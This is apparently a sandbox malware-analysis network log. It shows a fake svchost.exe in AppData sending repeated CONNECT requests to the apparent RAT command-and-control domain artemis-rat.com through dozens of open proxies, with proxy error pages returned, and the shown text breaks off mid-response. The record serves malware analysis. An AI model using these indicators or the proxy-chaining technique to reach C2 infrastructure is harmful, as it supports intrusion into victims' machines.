Mar 9, 2024 13:14:36.111488104 CET	629	IN	HTTP/1.1 407 Proxy Authentication Required Date: Sat, 09 Mar 2024 12:14:35 GMT Server: Apache Proxy-Authenticate: Basic realm="Authorization" Content-Length: 415 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>407 Proxy Authentication Required</title></head><body><h1>Proxy Authentication Required</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3364	192.168.2.5	60850	148.72.23.56	3260	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.705073118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.373935938 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.117336988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.378504992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3365	192.168.2.5	60766	51.158.108.134	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.708529949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.374258995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.366385937 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3366	192.168.2.5	60773	161.97.74.176	30000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.766779900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3367	192.168.2.5	60751	185.38.111.1	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.767949104 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:36.089368105 CET	75	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Length: 0
Mar 9, 2024 13:14:36.410840988 CET	103	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3368	192.168.2.5	60778	91.189.177.188	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.768771887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.090747118 CET	1286	IN	HTTP/1.1 403 Forbidden Server: squid/5.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3628 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from lb1 X-Cache-Lookup: NONE from lb1:3128 Via: 1.1 lb1 (squid/5.7) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3369	192.168.2.5	60888	172.67.182.126	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.769047022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.923554897 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3370	192.168.2.5	60192	138.2.73.157	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.769695997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3371	192.168.2.5	60900	104.27.83.183	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.770972013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.925508022 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3372	192.168.2.5	60901	104.21.64.208	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.771466970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.925904989 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3373	192.168.2.5	60226	46.229.253.67	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.771944046 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.880295038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3374	192.168.2.5	60686	220.247.161.235	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.772098064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3375	192.168.2.5	60802	203.222.24.36	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.772387028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3376	192.168.2.5	60224	218.255.187.60	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.772886992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.880294085 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3377	192.168.2.5	60769	139.224.64.191	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.773210049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.118145943 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3378	192.168.2.5	59540	75.119.145.154	25084	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.773308992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3379	192.168.2.5	60806	125.141.139.55	5566	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.773556948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.474126101 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.366430044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3380	192.168.2.5	60278	188.132.222.194	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.776791096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3381	192.168.2.5	56393	181.78.19.248	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.777457952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.849190950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3382	192.168.2.5	60805	88.79.243.103	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.780817986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.101351023 CET	1254	IN	HTTP/1.1 403 Forbidden Server: squid/3.5.28 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html;charset=utf-8 Content-Length: 952 X-Squid-Error: ERR_ACCESS_DENIED 0 Content-Language: en X-Cache: MISS from ah_test Via: 1.1 ah_test (squid/3.5.28) Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 